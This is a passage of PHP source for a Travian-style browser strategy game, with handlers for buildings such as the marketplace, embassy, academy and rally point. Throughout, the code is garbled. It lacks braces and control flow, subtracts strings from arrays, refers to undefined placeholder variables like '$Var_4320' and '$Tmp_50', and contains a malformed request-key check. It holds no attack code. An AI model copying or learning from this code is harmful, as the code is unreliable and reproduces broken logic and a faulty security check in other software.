						$this->handleTroopBuilding( );
					case 22 :
						$this->productionPane = FALSE;
						$this->buildingView = "Academy";
						$this->handleAcademy( );
					case 23 :
						$this->productionPane = TRUE;
						$this->buildingView = "Cranny";
					case 24 :
						$this->productionPane = FALSE;
						$this->buildingView = "TownHall";
						$this->handleTownHall( );
					case 25 :break;
					case 26 :
						$this->productionPane = FALSE;
						$this->buildingView = "Residence_Palace";
					case 37 :
						$this->productionPane = FALSE;
						$this->buildingView = "HerosMansion";
						$this->handleHerosMansion( );
					case 40 :
						$this->productionPane = FALSE;
					case 42 :
						$this->_getOnlyMyTroops( );
						$this->productionPane = TRUE;
						$this->buildingView = "Warrior";
						$this->handleWarrior( );

	public function handleBlacksmithArmoury(){
		$this->troopsUpgradeType = $this->buildings[$this->buildingIndex]['item_id'] == 12 ? QS_TROOP_UPGRADE_ATTACK : QS_TROOP_UPGRADE_DEFENSE;
		$this->troopsUpgrade = array();
		$_arr = explode(",", $this->data['troops_training']);
		$_c = 0;
		foreach ( $_arr as $troopStr ){
			$attack_level = explode( " ", $troopStr[3] );
			$defense_level = explode( " ", $troopStr[2] );
			$researches_done = explode( " ", $troopStr[1] );
			$troopId = explode( " ", $troopStr[0] );
			$tlevel = $this->troopsUpgradeType == QS_TROOP_UPGRADE_ATTACK ? $attack_level : $defense_level;
			if ( $troopId != 99 && $_c <= 8 && $tlevel < 20 && $researches_done == 1 ){
				$this->troopsUpgrade[$troopId] = $tlevel;
		if(!empty($_GET['k']) == $this->data['update_key'] && !isset($this->queueModel->tasksInQueue[$this->troopsUpgradeType] ) && isset( $this->troopsUpgrade[intval( $_GET['a'] )] ) && !$this->isGameTransientStopped( ) && !$this->isGameOver( ) )
            $troopId = intval( $_GET['a'] );
            $level = $this->troopsUpgrade[$troopId];
            $buildingMetadata = $this->gameMetadata['items'][$this->buildProperties['building']['item_id']]['troop_upgrades'][$troopId][$level];
            if ( !$this->isResourcesAvailable( $buildingMetadata['resources'] ) )
                $calcConsume = intval( $buildingMetadata['time_consume'] / $this->gameSpeed * ( 10 / ( $this->buildProperties['building']['level'] + 9 ) ) );
                $newTask = new QueueTask( $this->troopsUpgradeType, $this->player->playerId, $calcConsume );
                $newTask->villageId = $this->data['selected_village_id'];
                $newTask->procParams = $troopId." ".( $level + 1 );
                $newTask->tag = $buildingMetadata['resources'];
                $this->queueModel->addTask( $newTask );

    public function handleMainBuilding( )
        if ( $this->isPost( ) && isset( $_POST['drbid'] ) && 19 <= intval( $_POST['drbid'] ) && intval( $_POST['drbid'] ) <= sizeof( $this->buildings ) && isset( $this->buildings[$_POST['drbid']] ) && 0 < $this->buildings[$_POST['drbid']]['level'] && !isset( $this->queueModel->tasksInQueue[QS_BUILD_DROP] ) && !$this->isGameTransientStopped( ) && !$this->isGameOver( ) )
            $item_id = $this->buildings[$_POST['drbid']]['item_id'];
            $calcConsume = intval( $this->gameMetadata['items'][$item_id]['levels'][$this->buildings[$_POST['drbid']]['level'] - 1]['time_consume'] / $this->gameSpeed * ( $this->data['time_consume_percent'] / 400 ) );
            $newTask = new QueueTask( QS_BUILD_DROP, $this->player->playerId, $calcConsume );
            $newTask->villageId = $this->data['selected_village_id'];
            $newTask->buildingId = $item_id;
            $newTask->procParams = $this->buildings[$_POST['drbid']]['index'];
            $this->queueModel->addTask( $newTask );
            if ( !$this->isGameOver( ) )
                $this->queueModel->cancelTask( $this->player->playerId, intval( $_GET['qid'] ) );

    public function handleRallyPoint( )
        if ( isset( $_GET['d'] ) )
            $this->queueModel->cancelTask( $this->player->playerId, intval( $_GET['d'] ) );
        $this->rallyPointProperty = array( "troops_in_village" => array( "troopsTable" => $this->_getTroopsList( "troops_num" ), "troopsIntrapTable" => $this->_getTroopsList( "troops_intrap_num" ) ), "troops_out_village" => array( "troopsTable" => $this->_getTroopsList( "troops_out_num" ), "troopsIntrapTable" => $this->_getTroopsList( "troops_out_intrap_num" ) ), "troops_in_oases" => array( ), "war_to_village" => $this->queueModel->tasksInQueue['war_troops']['to_village'], "war_from_village" => $this->queueModel->tasksInQueue['war_troops']['from_village'], "war_to_oasis" => $this->queueModel->tasksInQueue['war_troops']['to_oasis'] );
        $village_oases_id = trim( $this->data['village_oases_id'] );
        if ( $village_oases_id != "" )
            $m = new BuildModel( );
            $result = $m->getOasesDataById( $village_oases_id );
            while ( $result->next( ) )
                $this->rallyPointProperty['troops_in_oases'][$result->row['id']] = array( "oasisRow" => $result->row, "troopsTable" => $this->_getOasisTroopsList( $result->row['troops_num'] ), "war_to" => isset( $this->rallyPointProperty['war_to_oasis'][$result->row['id']] ) ? $this->rallyPointProperty['war_to_oasis'][$result->row['id']] : NULL );
            $m->dispose( );

    public function _canCancelWarTask( $taskType, $taskId )
        if ( !( $taskType ) )
            return FALSE;
        $timeout = ( $taskType );
        if ( 0 - 1 < $timeout )
            $_task = NULL;
            foreach ( $this->queueModel->tasksInQueue[$taskType] as $t )
                if ( $t['id'] == $taskId )
                    $_task = $t;
            if ( $_task == NULL )
                return FALSE;
            $elapsedTime = $t['elapsedTime'];
            if ( $timeout < $elapsedTime )
                return FALSE;
        return TRUE;

    public function _getOasisTroopsList( $troops_num )
        $GameMetadata = $GLOBALS['GameMetadata'];
        $m = new BuildModel( );
        $returnTroops = array( );
        if ( trim( $troops_num ) != "" )
            $t_arr = explode( "|", $troops_num );
            foreach ( $t_arr as $t_str )
                $t2_arr = explode( ":", $t_str );
                $vid = $t2_arr[0];
                $villageData = $m->getVillageData2ById( $vid );
                $returnTroops[$vid] = array( "villageData" => $villageData, "cropConsumption" => 0, "hasHero" => FALSE, "troops" => array( ) );
                $t2_arr = explode( ",", $t2_arr[1] );
                foreach ( $t2_arr as $t2_str )
                    $tnum = explode( " ", $t2_str[1] );
                    $tid = explode( " ", $t2_str[0] );
                    if ( $tid == 99 )
                    if ( $tnum == 0 - 1 )
                        $tnum = 1;
                        $returnTroops[$vid]['hasHero'] = TRUE;
                        $returnTroops[$vid]['troops'][$tid] = $tnum;
                    $returnTroops[$vid] += "cropConsumption";
        $m->dispose( );
        return $returnTroops;

    public function _getTroopsList( $key )
        $GameMetadata = $GLOBALS['GameMetadata'];
        $m = new BuildModel( );
        $returnTroops = array( );
        if ( trim( $this->data[$key] ) != "" )
            $t_arr = explode( "|", $this->data[$key] );
            foreach ( $t_arr as $t_str )
                $t2_arr = explode( ":", $t_str );
                $vid = intval( $t2_arr[0] );
                $villageData = NULL;
                if ( $vid == 0 - 1 )
                    $vid = $this->data['selected_village_id'];
                    $villageData = array( "id" => $vid, "village_name" => $this->data['village_name'], "player_id" => $this->player->playerId, "player_name" => buildings_p_thisvillage );
                    $villageData = $m->getVillageData2ById( $vid );
                $returnTroops[$vid] = array( "villageData" => $villageData, "cropConsumption" => 0, "hasHero" => FALSE, "troops" => array( ) );
                if ( $vid == $this->data['selected_village_id'] )
                    $returnTroops[$vid]['hasHero'] = intval( $this->data['hero_in_village_id'] ) == intval( $this->data['selected_village_id'] );
                    if ( $returnTroops[$vid]['hasHero'] )
                        $returnTroops[$vid] += "cropConsumption";
                $t2_arr = explode( ",", $t2_arr[1] );
                foreach ( $t2_arr as $t2_str )
                    $tnum = explode( " ", $t2_str[1] );
                    $tid = explode( " ", $t2_str[0] );
                    if ( $tid == 99 )
                    if ( $tnum == 0 - 1 )
                        $tnum = 1;
                        $returnTroops[$vid]['hasHero'] = TRUE;
                        $returnTroops[$vid]['troops'][$tid] = $tnum;

                    $returnTroops[$vid]['cropConsumption'] += $GameMetadata['troops'][$tid]['crop_consumption'] * $tnum;
        $m->dispose( );
        return $returnTroops;

    public function handleMarketplace( )
        $this->selectedTabIndex = isset( $_GET['t'] ) && is_numeric( $_GET['t'] ) && 1 <= intval( $_GET['t'] ) && intval( $_GET['t'] ) <= 3 ? intval( $_GET['t'] ) : 0;
        $itemId = $this->buildings[$this->buildingIndex]['item_id'];
        $itemLevel = $this->buildings[$this->buildingIndex]['level'];
        $tribeMetadata = $this->gameMetadata['tribes'][$this->data['tribe_id']];
        $tradeOfficeLevel = $this->_getMaxBuildingLevel( 28 );
        $capacityFactor = $tradeOfficeLevel == 0 ? 1 : $this->gameMetadata['items'][28]['levels'][$tradeOfficeLevel - 1]['value'] / 100;
        $capacityFactor *= $this->gameMetadata['game_speed'];
        $total_merchants_num = $this->gameMetadata['items'][$itemId]['levels'][$itemLevel - 1]['value'];
        $exist_num = $total_merchants_num - $this->queueModel->tasksInQueue['out_merchants_num'] - $this->data['offer_merchants_count'];
        if ( $exist_num < 0 )
            $exist_num = 0;
        $this->merchantProperty = array( "speed" => $tribeMetadata['merchants_velocity'] * $this->gameMetadata['game_speed'], "capacity" => floor( $tribeMetadata['merchants_capacity'] * $capacityFactor ), "total_num" => $total_merchants_num, "exits_num" => $exist_num, "confirm_snd" => FALSE, "same_village" => FALSE, "vRow" => NULL );
        if ( $this->selectedTabIndex == 0 )
            $m = new BuildModel( );
            if ( $this->isPost( ) || isset( $_GET['vid2'] ) )
                $resources = array( "1" => isset( $_POST['r1'] ) ? intval( $_POST['r1'] ) : 0, "2" => isset( $_POST['r2'] ) ? intval( $_POST['r2'] ) : 0, "3" => isset( $_POST['r3'] ) ? intval( $_POST['r3'] ) : 0, "4" => isset( $_POST['r4'] ) ? intval( $_POST['r4'] ) : 0 );
                $this->merchantProperty['confirm_snd'] = $this->isPost( ) ? isset( $_POST['act'] ) && $_POST['act'] == 1 : isset( $_GET['vid2'] );
                $map_size = $this->setupMetadata['map_size'];
                $doSend = FALSE;
                if ( $this->merchantProperty['confirm_snd'] )
                    $vRow = NULL;
                    if ( trim( $_POST['y'] ) != "" )
                        $vid = $this->__getVillageId( $map_size, $this->__getCoordInRange( $map_size, intval( $_POST['x'] ) ), $this->__getCoordInRange( $map_size, intval( $_POST['y'] ) ) );
                        $vRow = $m->getVillageDataById( $vid );
                        if ( isset( $_POST['vname'] ) && trim( $_POST['vname'] ) != "" )
                            $vRow = $m->getVillageDataByName( trim( $_POST['vname'] ) );
                            if ( isset( $_GET['vid2'] ) )
                                $vRow = $m->getVillageDataById( intval( $_GET['vid2'] ) );
                                if ( $vRow != NULL )
                                    $_POST['x'] = $vRow['rel_x'];
                                    $_POST['y'] = $vRow['rel_y'];
                    $doSend = TRUE;
                    $vRow = $m->getVillageDataById( intval( $_POST['vid2'] ) );
                    $this->merchantProperty['showError'] = FALSE;
                    $_POST['r1'] = $_POST['r2'] = $_POST['r3'] = $_POST['r4'] = "";
                if ( 0 < intval( $vRow['player_id'] ) && $m->getPlayType( intval( $vRow['player_id'] ) ) == PLAYERTYPE_ADMIN )
                    $this->merchantProperty['showError'] = FALSE;
                    $this->merchantProperty['confirm_snd'] = FALSE;
                    $this->merchantProperty['vRow'] = $vRow;
                    $vid = $this->merchantProperty['to_vid'] = $vRow != NULL ? $vRow['id'] : 0;
                    $rel_x = $vRow['rel_x'];
                    $rel_y = $vRow['rel_y'];
                    $this->merchantProperty['same_village'] = $vid == $this->data['selected_village_id'];
                    $this->merchantProperty['available_res'] = $this->isResourcesAvailable( $resources );
                    $this->merchantProperty['vRow_merchant_num'] = ceil( ( $resources[1] + $resources[2] + $resources[3] + $resources[4] ) / $this->merchantProperty['capacity'] );
                    $this->merchantProperty['confirm_snd'] = 0 < $vid && $this->merchantProperty['available_res'] && 0 < $this->merchantProperty['vRow_merchant_num'] && $this->merchantProperty['vRow_merchant_num'] <= $this->merchantProperty['exits_num'] && !$this->merchantProperty['same_village'];
                    $this->merchantProperty['showError'] = !$this->merchantProperty['confirm_snd'];
                    $distance = WebHelper::getDistance( $this->data['rel_x'], $this->data['rel_y'], $rel_x, $rel_y, $this->setupMetadata['map_size'] / 2 );
                    $this->merchantProperty['vRow_time'] = intval( $distance / $this->merchantProperty['speed'] * 3600 );
                    if ( !$this->merchantProperty['showError'] && $doSend && !$this->isGameTransientStopped( ) && !$this->isGameOver( ) )
                        $this->merchantProperty['confirm_snd'] = FALSE;
                        $this->merchantProperty -= "exits_num";
                        $newTask = new QueueTask( QS_MERCHANT_GO, $this->player->playerId, $this->merchantProperty['vRow_time'] );
                        $newTask->villageId = $this->data['selected_village_id'];
                        $newTask->toPlayerId = $vRow['player_id'];
                        $newTask->toVillageId = $vid;
                        $newTask->procParams = $this->merchantProperty['vRow_merchant_num']."|".( $resources[1]." ".$resources[2]." ".$resources[3]." ".$resources[4] );
                        $newTask->tag = $resources;
                        $this->queueModel->addTask( $newTask );
            $m->dispose( );
        else if ( $this->selectedTabIndex == 1 )
            $m = new BuildModel( );
            $showOfferList = TRUE;
            if ( isset( $_GET['oid'] ) && 0 < intval( $_GET['oid'] ) )
                $oRow = $m->getOffer2( intval( $_GET['oid'] ), $this->data['rel_x'], $this->data['rel_y'], $this->setupMetadata['map_size'] / 2 );
                if ( $oRow != NULL )
                    $aid = 0;
                    if ( $oRow['alliance_only'] && 0 < intval( $this->data['alliance_id'] ) )
                        $aid = $m->getPlayerAllianceId( $oRow['player_id'] );
                    $res2 = explode( "|", $oRow['offer'][1] );
                    $res1 = explode( "|", $oRow['offer'][0] );
                    $resArr1 = explode( " ", $res1 );
                    $needResources = array( "1" => $resArr1[0], "2" => $resArr1[1], "3" => $resArr1[2], "4" => $resArr1[3] );
                    $res1_item_id = 0;
                    $res1_value = 0;
                    $i = 0;
                    $_c = sizeof( $resArr1 );
                    while ( $i < $_c )
                        if ( 0 < $resArr1[$i] )
                            $res1_item_id = $i + 1;
                            $res1_value = $resArr1[$i];
                    $resArr1 = explode( " ", $res2 );
                    $giveResources = array( "1" => $resArr1[0], "2" => $resArr1[1], "3" => $resArr1[2], "4" => $resArr1[3] );
                    $res2_item_id = 0;
                    $res2_value = 0;
                    $i = 0;
                    $_c = sizeof( $resArr1 );
                    while ( $i < $_c )
                        if ( 0 < $resArr1[$i] )
                            $res2_item_id = $i + 1;
                            $res2_value = $resArr1[$i];
                    $distance = $oRow['timeInSeconds'] / 3600 * $oRow['merchants_speed'];
                    $acceptResult = $this->_canAcceptOffer( $needResources, $giveResources, $oRow['village_id'], $oRow['alliance_only'], $aid, $oRow['max_time'], $distance );
                    if ( $acceptResult == 5 && !$this->isGameTransientStopped( ) && !$this->isGameOver( ) )
                        $showOfferList = FALSE;
                        $this->merchantProperty['offerProperty'] = array( "player_id" => $oRow['player_id'], "player_name" => $oRow['player_name'], "res1_item_id" => $res1_item_id, "res1_value" => $res1_value, "res2_item_id" => $res2_item_id, "res2_value" => $res2_value );
                        $merchantNum = ceil( ( $giveResources[1] + $giveResources[2] + $giveResources[3] + $giveResources[4] ) / $this->merchantProperty['capacity'] );
                        $newTask = new QueueTask( QS_MERCHANT_GO, $this->player->playerId, $distance / ( $this->gameMetadata['tribes'][$this->data['tribe_id']]['merchants_velocity'] * $this->gameMetadata['game_speed'] ) * 3600 );
                        $newTask->villageId = $this->data['selected_village_id'];
                        $newTask->toPlayerId = $oRow['player_id'];
                        $newTask->toVillageId = $oRow['village_id'];
                        $newTask->procParams = $merchantNum."|".( $giveResources[1]." ".$giveResources[2]." ".$giveResources[3]." ".$giveResources[4] );
                        $newTask->tag = $giveResources;
                        $this->queueModel->addTask( $newTask );
                        $newTask = new QueueTask( QS_MERCHANT_GO, $oRow['player_id'], $oRow['timeInSeconds'] );
                        $newTask->villageId = $oRow['village_id'];
                        $newTask->toPlayerId = $this->player->playerId;
                        $newTask->toVillageId = $this->data['selected_village_id'];
                        $newTask->procParams = $oRow['merchants_num']."|".( $needResources[1]." ".$needResources[2]." ".$needResources[3]." ".$needResources[4] );
                        $newTask->tag = array( "1" => 0, "2" => 0, "3" => 0, "4" => 0 );
                        $this->queueModel->addTask( $newTask );
                        $m->removeMerchantOffer( intval( $_GET['oid'] ), $oRow['player_id'], $oRow['village_id'] );
            $this->merchantProperty['showOfferList'] = $showOfferList;
            if ( $showOfferList )
                $this->pageCount = 0 < $rowsCount ? ceil( $rowsCount / $this->pageSize ) : 1;
                $this->pageIndex = isset( $_GET['p'] ) && is_numeric( $_GET['p'] ) && intval( $_GET['p'] ) < $this->pageCount ? intval( $_GET['p'] ) : 0;
                $this->merchantProperty['all_offers'] = $m->getAllOffers( $this->data['selected_village_id'], $this->data['rel_x'], $this->data['rel_y'], $this->setupMetadata['map_size'] / 2, $this->gameMetadata['tribes'][$this->data['tribe_id']]['merchants_velocity'] * $this->gameMetadata['game_speed'], $this->pageIndex, $this->pageSize );
            $m->dispose( );
            if ( $this->selectedTabIndex == 2 )
                $m = new BuildModel( );
                $this->merchantProperty['showError'] = FALSE;
                $this->merchantProperty['showError3'] = FALSE;
                if ( $this->isPost( ) )
                    if ( 0 < intval( $_POST['rid2'] ) )
                        $resources1 = array( "1" => isset( $_POST['rid1'] ) && intval( $_POST['rid1'] ) == 1 ? intval( $_POST['m1'] ) : 0, "2" => isset( $_POST['rid1'] ) && intval( $_POST['rid1'] ) == 2 ? intval( $_POST['m1'] ) : 0, "3" => isset( $_POST['rid1'] ) && intval( $_POST['rid1'] ) == 3 ? intval( $_POST['m1'] ) : 0, "4" => isset( $_POST['rid1'] ) && intval( $_POST['rid1'] ) == 4 ? intval( $_POST['m1'] ) : 0 );
                        $resources2 = array( "1" => isset( $_POST['rid2'] ) && intval( $_POST['rid2'] ) == 1 ? intval( $_POST['m2'] ) : 0, "2" => isset( $_POST['rid2'] ) && intval( $_POST['rid2'] ) == 2 ? intval( $_POST['m2'] ) : 0, "3" => isset( $_POST['rid2'] ) && intval( $_POST['rid2'] ) == 3 ? intval( $_POST['m2'] ) : 0, "4" => isset( $_POST['rid2'] ) && intval( $_POST['rid2'] ) == 4 ? intval( $_POST['m2'] ) : 0 );
                        if ( intval( $_POST['rid1'] ) == intval( $_POST['rid2'] ) || intval( $resources1[1] + $resources1[2] + $resources1[3] + $resources1[4] ) <= 0 || intval( $resources2[1] + $resources2[2] + $resources2[3] + $resources2[4] ) <= 0 )
                            $this->merchantProperty['showError'] = TRUE;
                        else if ( 10 < ceil( ( $resources2[1] + $resources2[2] + $resources2[3] + $resources2[4] ) / ( $resources1[1] + $resources1[2] + $resources1[3] + $resources1[4] ) ) )
                            $this->merchantProperty['showError'] = TRUE;
                            $this->merchantProperty['showError3'] = TRUE;
                        $this->merchantProperty['available_res'] = $this->isResourcesAvailable( $resources1 );
                        if ( $this->merchantProperty['available_res'] && !$this->merchantProperty['showError'] )
                            $this->merchantProperty['vRow_merchant_num'] = ceil( ( $resources1[1] + $resources1[2] + $resources1[3] + $resources1[4] ) / $this->merchantProperty['capacity'] );
                            if ( 0 < $this->merchantProperty['vRow_merchant_num'] && $this->merchantProperty['vRow_merchant_num'] <= $this->merchantProperty['exits_num'] )
                                $this->merchantProperty -= "exits_num";
                                $this->data += "offer_merchants_count";
                                $offer = $resources1[1]." ".$resources1[2]." ".$resources1[3]." ".$resources1[4]."|".( $resources2[1]." ".$resources2[2]." ".$resources2[3]." ".$resources2[4] );
                                $m->addMerchantOffer( $this->player->playerId, $this->data['name'], $this->data['selected_village_id'], $this->data['rel_x'], $this->data['rel_y'], $this->merchantProperty['vRow_merchant_num'], $offer, isset( $_POST['ally'] ), 0 < intval( $_POST['d2'] ) ? intval( $_POST['d2'] ) : 0, $this->gameMetadata['tribes'][$this->data['tribe_id']]['merchants_velocity'] * $this->gameMetadata['game_speed'] );
                                foreach ( $resources1 as $k => $v )
                                    $this->resources[$k] -= "current_value";
                                $this->queueModel->_updateVillage( FALSE, FALSE );
                                $this->merchantProperty['showError'] = TRUE;
                            $this->merchantProperty['showError'] = TRUE;
                        $this->merchantProperty['showError'] = TRUE;
                        $this->merchantProperty['showError2'] = TRUE;
                else if ( isset( $_GET['d'] ) && 0 < intval( $_GET['d'] ) )
                    $row = $m->getOffer( intval( $_GET['d'] ), $this->player->playerId, $this->data['selected_village_id'] );
                    if ( $row != NULL )
                        $this->merchantProperty += "exits_num";
                        $this->data -= "offer_merchants_count";
                        $resources2 = explode( "|", $row['offer'][1] );
                        $resources1 = explode( "|", $row['offer'][0] );
                        $resourcesArray1 = explode( " ", $resources1 );
                        $res = array( );
                        $i = 0;
                        $_c = sizeof( $resourcesArray1 );
                        while ( $i < $_c )
                            $res[$i + 1] = $resourcesArray1[$i];
                        foreach ( $res as $k => $v )
                            $this->resources[$k] += "current_value";
                        $this->queueModel->_updateVillage( FALSE, FALSE );
                        $m->removeMerchantOffer( intval( $_GET['d'] ), $this->player->playerId, $this->data['selected_village_id'] );
                $this->merchantProperty['offers'] = $m->getOffers( $this->data['selected_village_id'] );
                $m->dispose( );
                if ( $this->selectedTabIndex == 3 && $this->isPost( ) && isset( $_POST['m2'] ) && is_array( $_POST['m2'] ) && sizeof( $_POST['m2'] ) == 4 && $this->gameMetadata['plusTable'][6]['cost'] <= $this->data['gold_num'] )
                    $resources = array( "1" => intval( $_POST['m2'][0] ), "2" => intval( $_POST['m2'][1] ), "3" => intval( $_POST['m2'][2] ), "4" => intval( $_POST['m2'][3] ) );
                    $oldSum = $this->resources[1]['current_value'] + $this->resources[2]['current_value'] + $this->resources[3]['current_value'] + $this->resources[4]['current_value'];
                    $newSum = $resources[1] + $resources[2] + $resources[3] + $resources[4];
                    if ( $newSum <= $oldSum )
                        foreach ( $resources as $k => $v )
                            $this->resources[$k]['current_value'] = $v;
                        $this->queueModel->_updateVillage( FALSE, FALSE );
                        $m = new BuildModel( );
                        $m->decreaseGoldNum( $this->player->playerId, $this->gameMetadata['plusTable'][6]['cost'] );
                        $m->dispose( );

    public function handleEmbassy( )
        if ( 0 < intval( $this->data['alliance_id'] ) )
            $this->embassyProperty = array( "level" => $this->buildings[$this->buildingIndex]['level'], "invites" => NULL, "error" => 0, "ally1" => "", "ally2" => "" );
            $maxPlayers = $this->gameMetadata['items'][18]['levels'][$this->embassyProperty['level'] - 1]['value'];
            $this->embassyProperty['ally1'] = $ally1 = trim( $_POST['ally1'] );
            $this->embassyProperty['ally2'] = $ally2 = trim( $_POST['ally2'] );
            if ( $ally1 == "" || $ally2 == "" )
                $this->embassyProperty['error'] = $ally1 == "" && $ally2 == "" ? 3 : $ally1 == "" ? 1 : 2;
                $m = new BuildModel( );
                if ( !$m->allianceExists( $this->embassyProperty['ally1'] ) )
                    $this->data['alliance_name'] = $this->embassyProperty['ally1'];
                    $this->data['alliance_id'] = $m->createAlliance( $this->player->playerId, $this->embassyProperty['ally1'], $this->embassyProperty['ally2'], $maxPlayers );
                    $m->dispose( );
                    $this->embassyProperty['error'] = 4;
                    $m->dispose( );
            $invites_alliance_ids = trim( $this->data['invites_alliance_ids'] );
            $this->embassyProperty['invites'] = array( );
            if ( $invites_alliance_ids != "" )
                $_arr = explode( "\n", $invites_alliance_ids );
                foreach ( $_arr as $_s )
                    $allianceName = explode( " ", $_s[1], 2 );
                    $allianceId = explode( " ", $_s[0], 2 );
                    $this->embassyProperty['invites'][$allianceId] = $allianceName;
            if ( !$this->isPost( ) )
                if ( isset( $_GET['a'] ) && 0 < intval( $_GET['a'] ) )
                    $allianceId = intval( $_GET['a'] );
                    if ( isset( $this->embassyProperty['invites'][$allianceId] ) )
                        $m = new BuildModel( );
                        $acceptResult = $m->acceptAllianceJoining( $this->player->playerId, $allianceId );
                        if ( $acceptResult == 2 )
                            $this->data['alliance_name'] = $this->embassyProperty['invites'][$allianceId];
                            $this->data['alliance_id'] = $allianceId;
                            unset( $Var_4320['invites'][$allianceId] );
                            $m->removeAllianceInvites( $this->player->playerId, $allianceId );
                        else if ( $acceptResult == 1 )
                            $this->embassyProperty['error'] = 15;
                        $m->dispose( );
                    if ( isset( $_GET['d'] ) && 0 < intval( $_GET['d'] ) )
                        $allianceId = intval( $_GET['d'] );
                        if ( isset( $this->embassyProperty['invites'][$allianceId] ) )
                            unset( $Var_5112['invites'][$allianceId] );
                            $m = new BuildModel( );
                            $m->removeAllianceInvites( $this->player->playerId, $allianceId );
                            $m->dispose( );

    public function handleWarrior( )
        $itemId = $this->buildings[$this->buildingIndex]['item_id'];
        $this->troopsUpgrade = array( );
        $_arr = explode( ",", $this->data['troops_training'] );
        foreach ( $_arr as $troopStr )
            $attack_level = explode( " ", $troopStr[3] );
            $defense_level = explode( " ", $troopStr[2] );
            $researches_done = explode( " ", $troopStr[1] );
            $troopId = explode( " ", $troopStr[0] );
            if ( $researches_done == 1 && 0 < $this->gameMetadata['troops'][$troopId]['gold_needed'] )
                $this->troopsUpgrade[$troopId] = $troopId;
        $this->warriorMessage = "";
        if ( $this->isPost( ) && isset( $_POST['tf'] ) && !$this->isGameTransientStopped( ) && !$this->isGameOver( ) )
            $cropConsume = 0;
            $totalGoldsNeeded = 0;
            foreach ( $_POST['tf'] as $troopId => $num )
                $num = intval( $num );
                if ( $num <= 0 || !isset( $this->troopsUpgrade[$troopId] ) )
                $totalGoldsNeeded += $this->gameMetadata['troops'][$troopId]['gold_needed'] * $num;
                $cropConsume += $this->gameMetadata['troops'][$troopId]['crop_consumption'] * $num;
            if ( $totalGoldsNeeded <= 0 )
                $canProcess = $totalGoldsNeeded <= $this->data['gold_num'];
                $this->warriorMessage = $canProcess ? 1 : 2;
                if ( $canProcess )
                    $troopsString = "";
                    foreach ( $this->troops as $tid => $num )
                        if ( $tid == 99 )
                        $neededNum = isset( $this->troopsUpgrade[$tid], $_POST['tf'][$tid] ) ? $_POST['tf'][$tid] : 0;
                        if ( $troopsString != "" )
                            $troopsString .= ",";
                        $troopsString .= $tid." ".$neededNum;
                    $m = new BuildModel( );
                    $m->decreaseGoldNum( $this->player->playerId, $totalGoldsNeeded );
                    $m->dispose( );
                    $this->data -= "gold_num";
                    $procParams = $troopsString."|0||||||1";
                    $buildingMetadata = $this->gameMetadata['items'][$this->buildProperties['building']['item_id']];
                    $bLevel = $this->buildings[$this->buildingIndex]['level'];
                    $needed_time = $buildingMetadata['levels'][$bLevel - 1]['value'] * 3600;
                    $newTask = new QueueTask( QS_WAR_REINFORCE, 0, $needed_time );
                    $newTask->toPlayerId = $this->player->playerId;
                    $newTask->toVillageId = $this->data['selected_village_id'];
                    $newTask->procParams = $procParams;
                    $newTask->tag = array( "troops" => NULL, "hasHero" => FALSE, "resources" => NULL, "troopsCropConsume" => $cropConsume );
                    $this->queueModel->addTask( $newTask );

	public function handleTroopBuilding(){
		$itemId = $this->buildings[$this->buildingIndex]['item_id'];
        $this->troopsUpgradeType = QS_TROOP_TRAINING;
        $this->troopsUpgrade = array( );
        $this->troopsUpgrade = QS_TROOP_TRAINING;
        $_arr = explode( ",", $this->data['troops_training'] );
        foreach ( $_arr as $troopStr )
            $attack_level = explode( " ", $troopStr[3] );
            $defense_level = explode( " ", $troopStr[2] );
            $researches_done = explode( " ", $troopStr[1] );
            $troopId = explode( " ", $troopStr[0] );
            if ( $researches_done == 1 && $this->_canTrainInBuilding( $troopId, $itemId ) )
                $this->troopsUpgrade[$troopId] = $troopId;
        if ( $this->isPost( ) && $Tmp_50 && !$this->isGameTransientStopped( ) && !$this->isGameOver( ) )
            foreach ( $_POST['tf'] as $troopId => $num )
                $num = intval( $num );
                if ( $num <= 0 || !isset( $this->troopsUpgrade[$troopId] ) || $this->_getMaxTrainNumber( $troopId, $itemId ) < $num )
                $timeFactor = 1;
                if ( $this->gameMetadata['troops'][$troopId]['is_cavalry'] == TRUE )
                    $flvl = $this->_getMaxBuildingLevel( 41 );
                    if ( 0 < $flvl )
                        $timeFactor -= $this->gameMetadata['items'][41]['levels'][$flvl - 1]['value'] / 100;
                $troopMetadata = $this->gameMetadata['troops'][$troopId];
                $calcConsume = intval( $troopMetadata['training_time_consume'] / $this->gameSpeed * ( 10 / ( $this->buildProperties['building']['level'] + 9 ) ) * $timeFactor );
                $newTask = new QueueTask( $this->troopsUpgradeType, $this->player->playerId, $calcConsume );
                $newTask->threads = $num;
                $newTask->villageId = $this->data['selected_village_id'];
                $newTask->buildingId = $this->buildProperties['building']['item_id'];
                $newTask->procParams = $troopId;
                $newTask->tag = array( "1" => $troopMetadata['training_resources'][1] * $this->buildingTribeFactor * $num, "2" => $troopMetadata['training_resources'][2] * $this->buildingTribeFactor * $num, "3" => $troopMetadata['training_resources'][3] * $this->buildingTribeFactor * $num, "4" => $troopMetadata['training_resources'][4] * $this->buildingTribeFactor * $num );
                $this->queueModel->addTask( $newTask );

    public function handleAcademy( )
        $this->troopsUpgradeType = QS_TROOP_RESEARCH;
        $this->troopsUpgrade = array( "available" => array( ), "soon" => array( ) );
        $_arr = explode( ",", $this->data['troops_training'] );
        foreach ( $_arr as $troopStr )
            $attack_level = explode( " ", $troopStr[3] );
            $defense_level = explode( " ", $troopStr[2] );
            $researches_done = explode( " ", $troopStr[1] );
            $troopId = explode( " ", $troopStr[0] );
            if ( $researches_done == 0 )
                $this->troopsUpgrade[$this->_canDoResearches( $troopId ) ? "available" : "soon"][] = $troopId;
        if ( $_GET['k'] == $this->data['update_key'] && !isset( $this->queueModel->tasksInQueue[$this->troopsUpgradeType] ) && $this->_canDoResearches( intval( $_GET['a'] ) ) && !$this->isGameTransientStopped( ) && !$this->isGameOver( ) )
            $troopId = intval( $_GET['a'] );
            $buildingMetadata = $this->gameMetadata['troops'][$troopId];
            $calcConsume = intval( $buildingMetadata['research_time_consume'] / $this->gameSpeed );
            $newTask = new QueueTask( $this->troopsUpgradeType, $this->player->playerId, $calcConsume );
            $newTask->villageId = $this->data['selected_village_id'];
            $newTask->procParams = $troopId;
            $newTask->tag = $buildingMetadata['research_resources'];
            $this->queueModel->addTask( $newTask );

    public function handleTownHall( )
        $buildingMetadata = $this->gameMetadata['items'][$this->buildProperties['building']['item_id']];
        $bLevel = $this->buildings[$this->buildingIndex]['level'];
